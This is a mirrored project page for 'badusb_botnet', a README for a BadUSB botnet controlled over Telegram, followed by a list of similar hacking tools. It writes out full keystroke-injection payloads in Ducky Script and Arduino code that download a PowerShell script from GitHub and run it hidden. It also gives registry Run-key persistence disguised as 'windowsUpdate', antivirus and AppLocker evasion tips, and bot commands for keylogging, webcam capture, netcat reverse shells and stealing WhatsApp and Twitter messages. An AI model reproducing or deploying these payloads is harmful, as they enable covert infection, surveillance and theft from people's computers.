GitPlanet

Cheap and reliable Node.js hosting starts at $3/month, and $1/month static HTML hosting

Created with love in Canada, visit hostnodejs.com today

Feel like to post an Ad? Learn Details
All Projects β†’ alexfrancow β†’ Badusb_botnet

alexfrancow / Badusb_botnet

πŸ‘₯😈 Infect a pc with badusb and establish a connection through telegram.

Programming Languages

powershell
5483 projects

Labels

arduinohackingtwittertelegramstreaminginfosectwitchremote-controlkeyloggerbotnet

Projects that are alternatives of or similar to Badusb botnet

Iky
OSINT Project
Stars: ✭ 203 (+534.38%)
Mutual labels:  hacking, infosec, twitter
Spytrojan keylogger
[Solo para programadores] Troyano espΓ­a | Keylogger solo para Windows, se replica en el sistema y se inicia automaticamente al iniciar sesiΓ³n. | EnvΓ­o de registro mediante [Base de Datos], [Gmail] o [BotTelegram].
Stars: ✭ 32 (+0%)
Mutual labels:  telegram, hacking, keylogger
Skraper
Kotlin/Java library and cli tool for scraping posts and media from various sources with neither authorization nor full page rendering (Facebook, Instagram, Twitter, Youtube, Tiktok, Telegram, Twitch, Reddit, 9GAG, Pinterest, Flickr, Tumblr, IFunny, VK, Pikabu)
Stars: ✭ 72 (+125%)
Mutual labels:  twitch, telegram, twitter
Paradoxiarat
ParadoxiaRat : Native Windows Remote access Tool.
Stars: ✭ 395 (+1134.38%)
Mutual labels:  hacking, keylogger, botnet
Dvwa
Damn Vulnerable Web Application (DVWA)
Stars: ✭ 5,727 (+17796.88%)
Mutual labels:  hacking, infosec
Universal Arduino Telegram Bot
Use Telegram on your Arduino (ESP8266 or Wifi-101 boards)
Stars: ✭ 569 (+1678.13%)
Mutual labels:  arduino, telegram
Dirsearch
Web path scanner
Stars: ✭ 7,246 (+22543.75%)
Mutual labels:  hacking, infosec
Brutal
Payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy . Brutal is a toolkit to quickly create various payload,powershell attack , virus attack and launch listener for a Human Interface Device ( Payload Teensy )
Stars: ✭ 678 (+2018.75%)
Mutual labels:  arduino, hacking
Streamlink
Streamlink is a CLI utility which pipes video streams from various services into a video player
Stars: ✭ 6,883 (+21409.38%)
Mutual labels:  twitch, streaming
Integrations
Connect your App to Multiple Messaging Channels with the W3C Open standard.
Stars: ✭ 721 (+2153.13%)
Mutual labels:  telegram, twitter
Awesome Developer Streams
πŸ‘©πŸΏβ€πŸ’»πŸ‘¨πŸΎβ€πŸ’»πŸ‘©πŸΌβ€πŸ’»πŸ‘¨πŸ½β€πŸ’»πŸ‘©πŸ»β€πŸ’» Awesome Developers, Streaming
Stars: ✭ 6,860 (+21337.5%)
Mutual labels:  twitch, streaming
Passphrase Wordlist
Passphrase wordlist and hashcat rules for offline cracking of long, complex passwords
Stars: ✭ 556 (+1637.5%)
Mutual labels:  hacking, infosec
Nishang
Nishang - Offensive PowerShell for red team, penetration testing and offensive security.
Stars: ✭ 5,943 (+18471.88%)
Mutual labels:  hacking, infosec
Keylogger
Get Keyboard,Mouse,ScreenShot,Microphone Inputs from Target Computer and Send to your Mail.
Stars: ✭ 604 (+1787.5%)
Mutual labels:  hacking, keylogger
Name That Hash
πŸ”— Don't know what type of hash it is? Name That Hash will name that hash type! πŸ€– Identify MD5, SHA256 and 3000+ other hashes β˜„ Comes with a neat web app πŸ”₯
Stars: ✭ 540 (+1587.5%)
Mutual labels:  hacking, infosec
Red Teaming Toolkit
This repository contains cutting-edge open-source security tools (OST) for a red teamer and threat hunter.
Stars: ✭ 5,615 (+17446.88%)
Mutual labels:  hacking, infosec
Dumpsterfire
"Security Incidents In A Box!" A modular, menu-driven, cross-platform tool for building customized, time-delayed, distributed security events. Easily create custom event chains for Blue- & Red Team drills and sensor / alert mapping. Red Teams can create decoy incidents, distractions, and lures to support and scale their operations. Build event sequences ("narratives") to simulate realistic scenarios and generate corresponding network and filesystem artifacts.
Stars: ✭ 775 (+2321.88%)
Mutual labels:  hacking, infosec
Active Directory Exploitation Cheat Sheet
A cheat sheet that contains common enumeration and attack methods for Windows Active Directory.
Stars: ✭ 870 (+2618.75%)
Mutual labels:  hacking, infosec
Orwell Rat And Botnet
Orwell is a RAT and Botnet designed as a trio of programs by Landon Powell.
Stars: ✭ 27 (-15.62%)
Mutual labels:  infosec, botnet
Logkeys
πŸ“ ⌨️ A GNU/Linux keylogger that works!
Stars: ✭ 518 (+1518.75%)
Mutual labels:  hacking, keylogger
View All Similar Projects βž”

badusb_botnet

😈πŸ‘₯ Infect a pc with badusb and establish a connection through telegram.

Configuration

############
## CONFIG ##
############

$BotToken = "<BOTTOKEN>"
$ChatID = '<CHATID>'
$githubScript = '<you_fork/poc.ps1>'

To create a telegram bot: https://core.telegram.org/bots#6-botfather

To get ChatID: https://stackoverflow.com/questions/32423837/telegram-bot-how-to-get-a-group-chat-id

Option 1: Powershell

Option 1.1: Simple

> [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
> (new-object net.webclient).DownloadFile('https://raw.githubusercontent.com/alexfrancow/badusb_botnet/master/poc.ps1','poc.ps1')
> powershell.exe -windowstyle hidden -file poc.ps1

DELAY 3000
GUI r
DELAY 500
STRING powershell
DELAY 500
ENTER
DELAY 750
STRING [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
DELAY 500
ENTER
STRING (new-object net.webclient).DownloadFile('https://raw.githubusercontent.com/alexfrancow/badusb_botnet/master/poc.ps1','poc.ps1')
DELAY 500
ENTER
STRING powershell.exe -windowstyle hidden -file poc.ps1
DELAY 500
ENTER

Link to convert to .ino: https://malduino.com/converter/

Option 1.2: Backdoor

> reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v windowsUpdate /f
> Invoke-WebRequest -Uri https://raw.githubusercontent.com/alexfrancow/badusb_botnet/master/poc.ps1 -OutFile C:\Users\$env:username\Documents\windowsUpdate.ps1
> reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v windowsUpdate /t REG_SZ /d "powershell.exe -windowstyle hidden -file C:\Users\$env:username\Documents\windowsUpdate.ps1"

DELAY 3000
GUI r
DELAY 500
STRING powershell
DELAY 500
ENTER
DELAY 750
STRING reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v windowsUpdate /f
DELAY 500
ENTER
STRING Invoke-WebRequest -Uri https://raw.githubusercontent.com/alexfrancow/badusb_botnet/master/poc.ps1 -OutFile C:\Users\$env:username\Documents\windowsUpdate.ps1
DELAY 500
ENTER
STRING reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v windowsUpdate /t REG_SZ /d "powershell.exe -windowstyle hidden -file C:\Users\$env:username\Documents\windowsUpdate.ps1"
DELAY 500
ENTER

Link to convert to .ino: https://malduino.com/converter/

Option 2: CMD

Windows Powershell is too slow at startup, so we can use cmd to download the '.ps1' file and execute it. To download a file with cmd, we can use two options: bitsadmin or certutil.exe. (Certutil is not installed by default on XP/Win2003 but is avaialble on the newer windows versions. For XP/2003 you'll need the Admin Tool Pack for windows server 2003).

Syntax

> bitsadmin /transfer myDownloadJob /download /priority normal http://downloadsrv/10mb.zip c:\10mb.zip
> certutil.exe -urlcache -split -f "https://download.sysinternals.com/files/PSTools.zip" pstools.zip

Option 2.1: Simple

> certutil.exe -urlcache -split -f "https://raw.githubusercontent.com/alexfrancow/badusb_botnet/master/poc.ps1" "Documents/windowsUpdate.ps1"
> powershell Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Unrestricted
> powershell.exe -windowstyle hidden -file "Documents/windowsUpdate.ps1"

or

> certutil.exe -urlcache -split -f "https://raw.githubusercontent.com/alexfrancow/badusb_botnet/master/poc.ps1" "Documents/windowsUpdate.ps1"
> powershell.exe -windowstyle hidden -executionPolicy bypass -file "Documents/windowsUpdate.ps1"

Avast detects this last option.

Option 2.2: Backdoor

> certutil.exe -urlcache -split -f "https://raw.githubusercontent.com/alexfrancow/badusb_botnet/master/poc.ps1" Documents\windowsUpdate.ps1
> powershell Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Unrestricted
> reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v windowsUpdate /t REG_SZ /d "powershell.exe -windowstyle hidden -file C:\Users\$env:username\Documents\windowsUpdate.ps1"
> reboot (?)

Example with digispark

#define kbd_es_es
#include "DigiKeyboard.h"
void setup() {
}

void loop() {
DigiKeyboard.sendKeyStroke(0);
DigiKeyboard.delay(500);
DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
DigiKeyboard.delay(500);
DigiKeyboard.print("powershell -noe -c \". mode.com con: lines=1 cols=40\"");
//DigiKeyboard.print("cmd");
//DigiKeyboard.print("cmd /k mode con:cols=20 lines=1");
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(3000);
DigiKeyboard.print("Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Unrestricted");
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(200);
DigiKeyboard.print("S");
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(500);
DigiKeyboard.print("[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12");
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(500);
DigiKeyboard.print("(new-object net.webclient).DownloadFile('https://raw.githubusercontent.com/alexfrancow/badusb_botnet/master/poc.ps1','poc.ps1')");
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(500);
DigiKeyboard.print("powershell.exe -windowstyle hidden -file poc.ps1");
DigiKeyboard.sendKeyStroke(KEY_ENTER);
for (;;) {
/*empty*/
    }
}

Keyboard en_US to es_ES: https://github.com/ernesto-xload/DigisparkKeyboard Decompress the archive and put all in : C:\Users\Administrador\AppData\Local\Arduino15\packages\digistump\hardware\avr\1.6.7\libraries\DigisparkKeyboard, later in the script you must put the following line to specify the keyboard layout.

#define kbd_es_es

Example with ATMega32u4

First, we need put the keyboard.h library in es_ES, to do this you can copy the Keyboard directory of this project into: "C:\Program Files (x86)\Arduino\libraries".

#include <Keyboard.h>

void setup() {
  Keyboard.begin(); //Start keyboard communication
  delay(3000);
  Keyboard.press(KEY_LEFT_GUI);
  delay(500);
  Keyboard.press('r');
  Keyboard.releaseAll();
  delay(500);

  Keyboard.println("cmd");
  delay(500);
  Keyboard.press(KEY_RETURN);
  delay(100);
  Keyboard.releaseAll();

  Keyboard.println("certutil.exe -urlcache -split -f \"https://raw.githubusercontent.com/alexfrancow/poc/master/poc.ps1\" \"Documents/poc.ps1\"");
  delay(500);
  Keyboard.press(KEY_RETURN);
  Keyboard.release(KEY_RETURN);

  Keyboard.println("powershell Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Unrestricted");
  delay(500);
  Keyboard.press(KEY_RETURN);
  Keyboard.release(KEY_RETURN);

  Keyboard.println("powershell.exe -windowstyle hidden -file \"Documents/poc.ps1\"");
  delay(500);
  Keyboard.press(KEY_RETURN);
  Keyboard.release(KEY_RETURN);
}
void loop() {
}

We use the \" to scape the double quotes in Arduino code.

Example with bitsadmin

Keyboard.println(" bitsadmin /transfer \"Descargando Drivers USB\" /download /priority high \"https://raw.githubusercontent.com/alexfrancow/poc/master/poc.ps1\" %TEMP%/poc.ps1 && echo Instalando Drivers: ");

Evade AVs

Obfuscating Binary Names

For Loop Value Extraction

FOR /F β€œdelims=s\ tokens=4” %a IN (β€˜set^|findstr PSM’)DO %a

Example:

Keyboard.println(" FOR /F \"delims=/ tokens=1\" %a IN ('where certutil')DO %a -urlcache -split -f \"https://raw.githubusercontent.com/alexfrancow/poc/master/poc.ps1\" \"Documents/poc.ps1\" ");

Bypass AppLocker

Policies of AppLocker are stored in HKEY_LOCAL_Machine\Software\Policies\Microsoft\Windows\SrpV2, You can verify the folders in which you have permission to run .ps1 scripts.

Telegram Options

Basic

  • /list (List all devices availables)
  • /select IP command (Execute a command)
  • /stop IP (Stop remote connection)
  • /cleanAll IP (Clean all files)
  • /ipPublic IP (Geolocate IP)
  • /download IP file (Download a file from PC)

Advanced

  • /screenshot IP (Capture screen)
  • /backdoor IP (Create a persistent backdoor)
  • /webcam IP
  • /keylogger IP time in seconds
  • /nc IP IP to connect ($ip) (First you must use nc -lp 8888 -v to create a listener)
  • /stopnc IP (Stop nc.exe and erase all archives)

Ultra

  • /hackT IP (Get Twitter messages if the victim is authenticated) [Only web - W10]
  • /hackW IP (Get WhatsApp messages if the victim is authenticated) [Only Web - W10]
  • /starttwitch IP STREAM_KEY (Start a video transmission on Twitch with ffmpeg)
  • /stoptwitch IP (Stop ffmpeg.exe and erase all archives)

PoCs

πŸ”—πŸ“Ί TOUR - POC

πŸ”—πŸ“Ί TWITCH STREAMING - POC

πŸ”—πŸ“Ί KEYLOGGER - POC

πŸ”—πŸ“Ί DIGISPARK - POC

{TODO}
  • Change all Invoke-WebRequest to cURL. (Invoke-WebRequest requires set up Internet Explorer)
  • Create an ID for each connected user.
  • Hack WhatsApp on .exe.
  • βœ”οΈ Fix Twitch streaming.
  • βœ”οΈ Fix keylogger.
  • Add monitor selector to screenshot.
  • Add windows version detector in HackTwitterW10() and hackWhatsAPPW10() functions.
  • Add hackGmail().
  • βœ”οΈ Verbose via telegram messages.
  • βœ”οΈ Netcat reverse connection.
Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].